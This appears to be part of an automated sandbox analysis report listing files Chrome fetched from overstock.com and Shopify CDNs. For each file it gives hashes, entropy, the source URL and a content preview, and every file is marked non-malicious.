                                                                                                                                                                                    Preview:import{bM as G,a as n,bN as P,bO as V,e as M,D as B,ae as I,aQ as A,bP as Q,V as p,aa as v,bQ as X,bR as j,h as _,A as F,q as J,w,bS as K,E as Y,a9 as Z,az as nn,bT as en,a$ as ln,ab as $}from"./app.DfgMZONA.js";const tn="_7Vwjr",an="tq3Uk",sn="oNgGT",on="n5gP0",cn="wSTmt",rn="_7tqW8",dn="gxa2t",m={Summary:tn,SummaryTextContainer:an,CollapsibleContainer:sn,Button:on,Label:cn,Logo:rn,Icon:dn},C=["base","none"],k=["base","none","large200","none"];function fn({id:e,label:l,logo:c,summary:i,error:r,to:h,action:d,...t}){const o="children"in t&&G.count(t.children)>0;return"onToggle"in t&&o&&t.onToggle!==void 0&&!h&&!d?n(P.Provider,{value:!0,children:n(gn,{id:e,label:l,logo:c,summary:i,error:r,disabled:t.disabled,renderChildrenWhenCollapsed:t.renderChildrenWhenCollapsed,...t})}):n(P.Provider,{value:!0,children:n(mn,{id:e,label:l,logo:c,summary:i,to:h,action:d})})}function un({layoutStyle:e,...l}){return e==="inline"?n(A,{blockAlignment:"start",columns:["1fr","3fr","auto"],spacing:"base",...l}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (4650)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4651
                                                                                                                                                                                    Entropy (8bit):5.4036576068997695
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:uwxsQlxIF8t31171HpojsnjqBjfUiX8P/74KAFG0hsXbfpvFawxZG:DJnImtLdpoj/BjhXtTG0hsXbRvEwq
                                                                                                                                                                                    MD5:BEB78DBCAC2CCBE37E1B5136C24B8EB7
                                                                                                                                                                                    SHA1:AA0DAC06A6277475528373631DAB92FB96E71CBA
                                                                                                                                                                                    SHA-256:2300D9A6E2B5528A95A046EC082E293AC05F5853FC782A9E54AACC61347E2383
                                                                                                                                                                                    SHA-512:BFF552C0A0FC211A80B180BD0D64DE30491E79204E248CB93623AF7F68133CAAA8B0EA012AB9511B1CC7C52FE8D4E8550EE5486C392577C678779D4C465AE68F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/ShopPayLoginLoader.DsmWyqS8.js
                                                                                                                                                                                    Preview:import{c as ne,aO as se,oM as z,cx as te,q as u,c0 as ie,h as I,oN as re,J as j,e as K,r as ce,l as G,m as le,cH as C,A as ue,o as he,bF as de,j0 as W,cF as me,iF as pe,bs as ge,T as F,ih as J,y as g,cI as Q,oO as V,oP as fe,a as o,ab as ye,bK as Se,hg as Pe,oQ as Le,oR as _e,he as be,bP as ke,V as q,hW as Ie,cK as Ce,fc as Te,j7 as we,O as Ae,Q as ve,bA as Ee,cM as b,f9 as x,hY as Oe,m8 as Me,E as h,ae as Re,a0 as De,a6 as Ne,v as Ue,oS as He}from"./app.DfgMZONA.js";import{a as ze,u as Y,b as Fe,p as Ve,S as xe,U as $e}from"./publishMessage.CX0yXme-.js";import{S as k,b as je,u as Ke}from"./Section.Dvvun2gq.js";const Ge=ne(!1);function We(){const a=se(),s=Object.keys(z).map(e=>[e,te[e]]),t=u(async()=>{s.forEach(([e,r])=>{a.write(r,z[e])})},[a,s]);return{shopPayLogout:Ge,resetShopPayParts:t}}const Je="_5Z70J",Qe={LoginIframe:Je},qe="shop-pay-login-iframe",Ye="100%",$="c1_login",Ze=250;function Be(){const a=ie(We().shopPayLogout),[s,t]=I(!0),[e,r]=I(Ze),c=re(),{progress:i}=j(),f=K(),d=ce
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (4605)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4606
                                                                                                                                                                                    Entropy (8bit):5.256379123451953
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:prRQMc0JiSJvHN3x2371xTEbJ38pkXVrcZoybZ55vBqNUc2b26Sq/gh/Rz5Xwy:jQ0/9K32JEkXzqlpwUc2b263Op1Ay
                                                                                                                                                                                    MD5:67419B4A0EA915385C03FAB8ACC19F28
                                                                                                                                                                                    SHA1:A9890CB0B1D39AEC8459B030A4E5D2B60D8AD998
                                                                                                                                                                                    SHA-256:B7B5498F9621E62205C750F4CBC5FC64AF1EFB45CF936C8C3B12496ED45A69DD
                                                                                                                                                                                    SHA-512:C2FB3DA0635033EB310626736A90D024F59B5B88958954E4CD3F0EE77D0620FFC6F78DBA2080D4FCF2A9EF25AD6F92F2AA3E8EC3A46F81BF430736F84CA5357B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/Rollup.B0QeYKuB.js
                                                                                                                                                                                    Preview:import{bM as G,a as n,bN as P,bO as V,e as M,D as B,ae as I,aQ as A,bP as Q,V as p,aa as v,bQ as X,bR as j,h as _,A as F,q as J,w,bS as K,E as Y,a9 as Z,az as nn,bT as en,a$ as ln,ab as $}from"./app.DfgMZONA.js";const tn="_7Vwjr",an="tq3Uk",sn="oNgGT",on="n5gP0",cn="wSTmt",rn="_7tqW8",dn="gxa2t",m={Summary:tn,SummaryTextContainer:an,CollapsibleContainer:sn,Button:on,Label:cn,Logo:rn,Icon:dn},C=["base","none"],k=["base","none","large200","none"];function fn({id:e,label:l,logo:c,summary:i,error:r,to:h,action:d,...t}){const o="children"in t&&G.count(t.children)>0;return"onToggle"in t&&o&&t.onToggle!==void 0&&!h&&!d?n(P.Provider,{value:!0,children:n(gn,{id:e,label:l,logo:c,summary:i,error:r,disabled:t.disabled,renderChildrenWhenCollapsed:t.renderChildrenWhenCollapsed,...t})}):n(P.Provider,{value:!0,children:n(mn,{id:e,label:l,logo:c,summary:i,to:h,action:d})})}function un({layoutStyle:e,...l}){return e==="inline"?n(A,{blockAlignment:"start",columns:["1fr","3fr","auto"],spacing:"base",...l}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (5864)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):630828
                                                                                                                                                                                    Entropy (8bit):4.3670817970855405
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:klkNKGpYHs0BMHxl679L1EM5oFaCWdf8invU6I/EQn:klk07379L1T5oFeU6I/L
                                                                                                                                                                                    MD5:44920488C360E599ACE572187816D2CB
                                                                                                                                                                                    SHA1:56926B9A9058E84065CCFE2EA727F16AFB1292FE
                                                                                                                                                                                    SHA-256:90AE4683258FA87565A0D44000C3877A15B9F3118C300EB7307F6B06AACC9E83
                                                                                                                                                                                    SHA-512:3EC6B22B1F6047932055F02D22062B37C01031BADC2E9BB7C1FB37D4AEE2E500D5BA24773C544E91ECF695C9CA1E94DEACBE179FEF8C88A5ECFD3E2336200AFB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/extensions/162002f6-08d7-4b02-b4ce-48655f8f0c90/kite-free-gift-discounts-409/assets/freeGiftLogicv1.js
                                                                                                                                                                                    Preview:..let DEFAULT_addToCartBtnSelectorsApp7Ext = 'input[name="add"], button[name="add"], form[action*="/cart/add"] .gfg__add-to-cart,form[action*="/cart/add"] button[type="submit"], form[action*="/cart/add"] input[type="submit"], .product-form__buttons, .productView-group, .prd-Benefits, .product__submit__buttons, .t4s-product-form__buttons, .product-form__buy-buttons, .product__description, .v-stack.gap-4, .quantity-selector, .groups-btn';.let DEFAULT_checkoutBtnSelectorsApp7Ext = 'button[name="checkout"], input[name="checkout"], form[action*="/cart"] a[href="/checkout"], a[href="/checkout"], form[action="/cart"] input[type="submit"][name="checkout"], form[action="/cart"] button[type="submit"][name="checkout"], .previewCartInfo, .cart__ctas, .cart__items, .buy-buttons--compact, .drawer__footer, .ajax-cart__buttons, .taxes-discounts, .button-container, cart-drawer .line-item__content-wrapper, .mini-cart__actions, .cart__checkout-wrapper, .cart__footer-message, .js-contents, .cart--footer';
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2812
                                                                                                                                                                                    Entropy (8bit):7.795654964618203
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:PABYqrer0Xrkzijby7typVAgTXOLRUM+TTErZ2R1fMySp1Nrdhz:WYqI+rkzcby78ijLb+TTErULqpDrPz
                                                                                                                                                                                    MD5:0310666F771AAC0E244629EDA6373EE3
                                                                                                                                                                                    SHA1:7DD1C67308E0E92C7BB750FA55F9F42038D9B13B
                                                                                                                                                                                    SHA-256:9008A56DE5E57CDC271F6AED0E6572209E4E602ED42763514C9AAE3EDD38DA7A
                                                                                                                                                                                    SHA-512:754B0E48DD080E95F43C375DDD880FEBC4DE2226BF7AA3D8ABA477C11DFCD4DDF4110933522D064FA5106C34D402CFF37DDFF5AC17132486F0E2D4A74F7BE41D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.PNG........IHDR... ... .....szz.....iCCPicc....c``\...[.$....WR........~...A...A..21...1 ...'.v...D_....@..LI-Nf``......\PT...........```.)...b``....!...;...V..............NBbC....d..Ld.$...A.R.....O2'.N....&`/.(m..Qs....$7......U...g..._{..K...KR+J@.....@a..6...E..._...' .f20loe`....SY........<...M...Ft....eXIfII*...........................V...........^...(.......................i.......f........e.......e................0210....................0100.................... ........... .......S......pHYs..,K..,K..=......IDATX..{.].U......;O?...3.<....&U.$*n..y.....T.,.J..B h...T.....HPD\h..Q.""...&Vb.m.C.S.!.{L..c{.s..s.......t...=g.}.......x...7.. .B..w.~.t'x.0.:.~R.{.....<z...w..u._&c...W....].j.0<.|...$.T`....`.<.q7...N"...a..Q..P.]/..+.vKh.R~.Y...,C..*.?z..*Z.X@.I..._Q.7..F#E._,S....1Vg.m.Jg.@?...d...2J.P^.X6*I..0...\...oi...B..L.X.}....vb.e....S~..#...H...w...<(..P........D+U.\#..g#.!......j.Ct....#...n..(......~.}Z<..(*l...6H.6..J..^)$...}0..|....U...U..T.-
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 53x38, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):432
                                                                                                                                                                                    Entropy (8bit):7.414060138926388
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:I94dJTkz+B37lBJ0QDSNz6NPGZ+xwUGpSaDW3K2:IadJnBrlBJcz6U3UG8or2
                                                                                                                                                                                    MD5:229037C6A6DB0310F202399CB79A6969
                                                                                                                                                                                    SHA1:48991A9811D8BFD0F0661A4053F83160A81704C4
                                                                                                                                                                                    SHA-256:003EF01C6584ACFF5FFEECDA62AFB23DC7EDE912D9340DBBEF1287BA028DABCC
                                                                                                                                                                                    SHA-512:E63D0DB528AE90C202C8ADF5B62718244DD00EBBC6F98FD113BAF349E4D9AB74613CBFDAE8F8AC8DED6A288E1EB2DC0A8759F59F1E5BF38E3494F0096F75805E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/intFlag_US.gif
                                                                                                                                                                                    Preview:RIFF....WEBPVP8 .........*5.&.?%..S.)%"....$.l.............z.^^......d.CW...1.....e.e.c.@I.......D....Y..f....:....ws..w....f...y.|..xg..f...."..%?:.@b...X..R.b..V..I.dQ.....?F....ki...$UV.g.%.y.FI..<.81...}G].r..|.j'@.....5......#q.s...h.....$W...".......V..........8..}.H{~...@..W^.&q=...%.........hNr.L.zT.W....=h.@:......&........2`tQr..}.Q..S.PK.-Z...........i.s.y....4..Q?U.(... ...".D.....i.n-....?j}.5..+. ..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 800x800, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):96172
                                                                                                                                                                                    Entropy (8bit):7.997984216649327
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:1536:VoSYB5txy2aAl5Gn+0ZLTVuvimmnq8WO27eAVr7dt6NjDP6IY1PWidA2tzYoE9bc:VoSYBjxy2R5o7nRw6+SvP6I8SNoE9/on
                                                                                                                                                                                    MD5:A009F0F2929ED2A3C2611E0C281C1C10
                                                                                                                                                                                    SHA1:049E78A942081350162E32F8F1086E206E95EC40
                                                                                                                                                                                    SHA-256:7360E1B3E34A356811DCE82CB916C76DCC32CBB25F5C60B4B18F3C3094F7DC8C
                                                                                                                                                                                    SHA-512:36CA656E1BA793D5E9631B9EF200A275F5DA7F41A53BF37540390BF0BDD3A4CE42C44457669993086D1FE3051646702A5CFB5A2D77E218A82F0C27A8B17068A5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/images/products/is/images/direct/21bce1a6f4028e0f8b6bd8837de082bfcb656002/Crestway-Navy-Blue-Solid-Wood-Rustic-Entryway-Console-Table.jpg?imwidth=900&impolicy=high
                                                                                                                                                                                    Preview:RIFF.w..WEBPVP8 .w..P....* . .>1..C.!.$&sZ....en..Y;..._.....9.v.....!...7>...of.....Q...W...y..0|.-.X.y...T.[0.M..=.......=..k.e...................k.?..P.._...~.|'.....s.o./R....~....x.............G........Oh....?..[.....................7.%...?.?....c....Y.....?...}.....?.}I.}.o......Q...?..0.J...O.../...?...........x.._.....Q..........G........~....o............~............}?~....../.?....h}.|.=..o...w#...[K?..SM..+%........b.w...{6..R.pA.w...+..-.{O9.H.....N'.O..-...{~.c....Rrs4. dr..\.h...3)..4M...~..yv...9....O.p.....(...W!...gGg..Q....]..0E...J...VW.`.N.&~..hN>y.8XJ..]f...(.Y...5Ib.Csl...#..#.}?....^.|9t...& .w.%.......).3H...`Mb...S...tP.6".;...>......3*D...:.R..-...3.,.D$..sZ........|.+k..'?.......F..V5=Q.;.........[.......?m.4...z..Q._&..+=......o8s.~.n~...\'..c.Y).....p~#QP....o}.t..S0qR.r....(.?..Y.......'e"...#......q..{ek...~)&?..93....]..D........v..kT.F`.tI. ..K`...U.w..,(..P.)^...=S;y5O.....1.t.j.*Q.Lw{..&.7..B\..MS...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.75
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:HGfhR:mZR
                                                                                                                                                                                    MD5:7349B1E14E46150EF64E9374FB943D9D
                                                                                                                                                                                    SHA1:B2C1878A6EDB3A00C8C041CD9F6268DF7FCB139E
                                                                                                                                                                                    SHA-256:F26F08E727D570BAA45EA5E9562F1F0FB72B0DEEED56B940F8819C15823BC5C0
                                                                                                                                                                                    SHA-512:8763E477D4280580B635A7DAD6C69B1027E345A51D190256CEEEEBD217BCC4394A96060EDFE296F2442671CD992967B0F55C195A46432F9EDC52D809E9C2A7B1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAnDBuJHT-7fFhIFDVn5lfQ=?alt=proto
                                                                                                                                                                                    Preview:CgkKBw1Z+ZX0GgA=
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (58819)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2692538
                                                                                                                                                                                    Entropy (8bit):5.320006470340414
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:ViGoSGruZVBgXGbVTSqomSleJ1ZrRO2rBN7jkZFMVtZeras2w7Ite6Xmp+LNoE0Z:VY+qsUBYLFr1+Vz
                                                                                                                                                                                    MD5:8E088FBF13AF60F0A3DFB29E11EB4324
                                                                                                                                                                                    SHA1:DC21DBD58B776B2C983CA850AE750745B3A42F2D
                                                                                                                                                                                    SHA-256:7CCE9B97CCBC922316EC2441345642B33DA1BCD3E852449CE320BE656E9A2C39
                                                                                                                                                                                    SHA-512:BA5A7524088A22DACC34AF5B86E16CE6CEE8AE05ECCF87878B84BCD957721FD0768849B35A0E9092473377CE3B5675AE58395406AC6BFBFDE8BF85CA29F98DD9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/collections/home-improvement
                                                                                                                                                                                    Preview:<!doctype html>.<html class="no-js" lang="en" dir="ltr">.<head>. <script>. if (!window.DOMAINE) window.DOMAINE = {};. window.DOMAINE.technical = {. apiVersion: "2024-07",. storefrontToken: "72e5b536982e2714efe8f8314d50d8f3",. shopName: "a37a28-2.myshopify.com",. localization: {. countryCode: "US",. currencyCode: "USD". }. };.</script>.. <script>. const _url = new URL("https://www.overstock.com/collections/home-improvement").. if (_url.host === 'a37a28-2.myshopify.com' || _url.host === 'checkout.overstock.com') {. _url.host = 'www.overstock.com';. window.location = _url.toString();. }.. if (_url.pathname === '/account/login') {. const loginURL = new URL('?redirect_to=https%3A%2F%2Fwww.overstock.com%2F', 'https://login.overstock.com');. window.location = loginURL.toString();. }. . const query = new URLSearchParams(window.location.search).get('q')?.toLowerCase();. const path = window.location.pathname;.. if (path
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1804
                                                                                                                                                                                    Entropy (8bit):7.001281561930557
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:0iATCIl/X2YlXWI2PUHADuHBR1bOJUMXbFNyBkiSZxDxemDJEbAEmqjrv0:pIl/XflB8WR1KGObhZymlGAEr8
                                                                                                                                                                                    MD5:E96EA65A7DEF847E5C0B0D04FE3F6C74
                                                                                                                                                                                    SHA1:DCF3FDA9573E0DB7EF6948FFB6AC5C9EDB3226AA
                                                                                                                                                                                    SHA-256:6970FC3F6D40B42F404048743FF38BD164834B6ECAECD6738AE3C46A6904BD75
                                                                                                                                                                                    SHA-512:734A1C0C863614E77DED29AD1B98F53D54FE2C59B9BC5FD580B757A51AF7D67A3E29C489605932DC27432A544418C94BF72308BCE7B1F6E11557AAAE8B335D69
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_845b63f1-5710-4961-8906-ea992b97799f.jpg?v=1729322973&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 t........*P.P.>-..B........bY.1..^b.2..._...\........o....%....~..D.._.Lx.......c..e..~&n....5....!&.{v!.l......^P.OX..".8.n^.<..R.$bh...(...f..............b..g...L.01..&|C..(.T..<.....&..e.w......~.u.|..Y........o....o/.0E.........rd.._..%.?G..4......j......{..F~mD.O.....%.. )B.\.O.#Y.e6.....\_.u...1B6....Ku.....Yz.bkV..y.K...3.....'..X.hK..Y..X..VK.......T.N4.c.z..@]...x..s.........t..:.&..uZx../.@..D.!...{.:..rB.AH.L......'..N.I.g..D.....\.. ....H..Q...]}.{j.e.O.*+^A...g....!.3?...W:.A.....$...5ET.....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):121
                                                                                                                                                                                    Entropy (8bit):4.5666837466907895
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YLAfHNVqkW/+eOCAnBIV5Sc3RZJbZ2k64bKGQVQsLVn:YWtIkW/fAnBoQchZJbsMbKpLVn
                                                                                                                                                                                    MD5:A06C16F404975AB2DC0CB003AD548366
                                                                                                                                                                                    SHA1:86E7974FD77ADDD4D32A3F59875051F25A3A45F9
                                                                                                                                                                                    SHA-256:E14B55193DAC7F11C857F6BF26AB5B70AB84A409192E448034B3004EFC9B7698
                                                                                                                                                                                    SHA-512:F7A74FB3E887F1F006D5EE049230D11935A809F3D92EA3A0A86724A1C49BD71ACA194963C4356CA66C547DFB167E22041F39118F91579ACFF80C77A720F33D7A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/37920301/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"37920301","rollup":{"rating_count":0,"review_count":0,"answered_questions":0}}]}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1814
                                                                                                                                                                                    Entropy (8bit):6.556040692236641
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZYH3oKULQ2bk9CG/uoe0cMMxqRWiww52VvVlEn:NBIl/XflVxm0LQgk9CG/c0cMMxo2vVa
                                                                                                                                                                                    MD5:58325F2D78B39E401C22C7B39656E654
                                                                                                                                                                                    SHA1:9F01512446C0FB7D3244175C2E4744783C653A29
                                                                                                                                                                                    SHA-256:B6475F7847B24A24F735CB546BEA832CACBE46F3BB2DEE924C42D2AA515737DE
                                                                                                                                                                                    SHA-512:3B5D1071223E4F6BD23933EF9AD1A9B99AC11DE4A9799A4CBFF7C2E653798F16AE77954215E2247E0CAFF3AE18574E602626DF57BBE40F0CFF346FEFB17387B1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P.............................................................................................B.ZR\Smd..U.r.o...4.......+7...F...2.6.FB....SRB.o.Y..................3..........................!.1A.Q"2q..a..#@Pr.......
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1489)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):210775
                                                                                                                                                                                    Entropy (8bit):5.494234294087348
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:Soat+KbTz+tOyPIvqYsfIRqOSgwOpP3kpQx8l0stdZ/I:ScAyySFysd/I
                                                                                                                                                                                    MD5:FF7213646BEF27B0E35C9768789DB7CB
                                                                                                                                                                                    SHA1:F7393CBD897588D26F07B627EE05CB5782C3F58D
                                                                                                                                                                                    SHA-256:D7923066DB2B7A7AC042897644F2E927BB43CC45450C2D3BCA92B0561B85480F
                                                                                                                                                                                    SHA-512:BF9FB81306109AF3E0C6C24C8864679E2084A574C40E4AA2B5E26DF4F5752CEDE584B5FEDE8594A4F09FA49683B305BD59EB530BA261127E83A2AE95D70FFAB5
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://js.appboycdn.com/web-sdk/5.1/braze.no-amd.min.js
                                                                                                                                                                                    Preview:/*.* Braze Web SDK v5.1.1.* (c) Braze, Inc. 2024 - http://braze.com.* License available at https://github.com/braze-inc/braze-web-sdk/blob/master/LICENSE.* Compiled on 2024-02-13.*/.(function(){(function(b,a){if("object"===typeof module&&module.exports) {var e = a();module.exports=e;module.exports.default=e;}else if(b.braze){var d=a(),c;for(c in d)b.braze[c]=d[c]}else b.braze=a()})("undefined"!==typeof self?self:this,function(){var brazeInterface={};var n;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}function r(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if("number"==typeof a.length)return{next:aa(a)};throw Error(String(a)+" is not an iterable or ArrayLike");}function ca(a){if(!(a instanceof Array)){a=r(a);for(var b,c=[];!(b=a.next()).done;)c.push(b.value);a=c}return a}.var da="function"==typeof Object.create?Object.create:function(a){function b(){}b.prototype=a;return new b},fa="function"
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1180
                                                                                                                                                                                    Entropy (8bit):4.739071859478317
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YMIfUQf8PLp2LVxGVL4/q1zALZv6Lmx+LWfQXRqaLj1yLfWLhOfVYLV:YBT8PLULzGVLhzALwLNLWf+LjcL+L0VM
                                                                                                                                                                                    MD5:E6077BFBF0BE62A68B7A8DD5286F721F
                                                                                                                                                                                    SHA1:BFBADA4956F122C96AE37B4970294326AA2A1D71
                                                                                                                                                                                    SHA-256:560390AD2AD69E3C6D7A6C07A7B46ADBFDF126FB3155AD5504BED758F9210A46
                                                                                                                                                                                    SHA-512:E7DBDFC51141CF817EBA11063B56AD829AFD9E1A601E018DB005B2242A8E6BCE539C91CAD9FD47E536D28260465251BF74A7451EDBE01B3892E9D582F5A2D852
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"33062936","rollup":{"average_rating":4.15,"rating_count":47,"review_count":47,"answered_questions":0}},{"page_id":"33332136","rollup":{"average_rating":4.63,"rating_count":19,"review_count":19,"answered_questions":0}},{"page_id":"35523736","rollup":{"average_rating":4.63,"rating_count":8,"review_count":8,"answered_questions":0}},{"page_id":"35317115","rollup":{"average_rating":4.67,"rating_count":15,"review_count":15,"answered_questions":0}},{"page_id":"36272470","rollup":{"average_rating":4.51,"rating_count":74,"review_count":74,"answered_questions":0}},{"page_id":"37753800","rollup":{"average_rating":4.5,"rating_count":16,"review_count":16,"answered_questions":0}},{"page_id":"6986413","rollup":{"average_rating":3.97,"rating_count":147,"review_count":147,"answered_questions":0}},{"page_id":"14638099","rollup":{"average_rating":4.56,"rating_count":349,"review_count":349,"answered_questions":0}},{"page_id":"31028687","rollup":{"average_rating":4.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (63731)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):137770
                                                                                                                                                                                    Entropy (8bit):5.322166982227251
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:vBX3hojdALuld890ANs9i2DUCRJCAIc77UuDo+:5X3haMuldQK9i2DUCRIAIE7UV+
                                                                                                                                                                                    MD5:C5A6761F646794796E3E34332FBAB17A
                                                                                                                                                                                    SHA1:7501E135DC7A3AED832DD09DD5E88C780F75A36D
                                                                                                                                                                                    SHA-256:A5C3D4EE8F7207D2E5638C38C05EC09134B202C5F414926D311006E7BF4945CB
                                                                                                                                                                                    SHA-512:45EE05A3B6E8E7F0C74096B4A89EC4CFBF82B3E17D07660FE56996F3EA01563511FAD85EF96A96CB6FB6F61C06E816F2AB99EE04CE41B2FB0FBFC0B45CE3C670
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/OnePage.BKvQv9YM.js
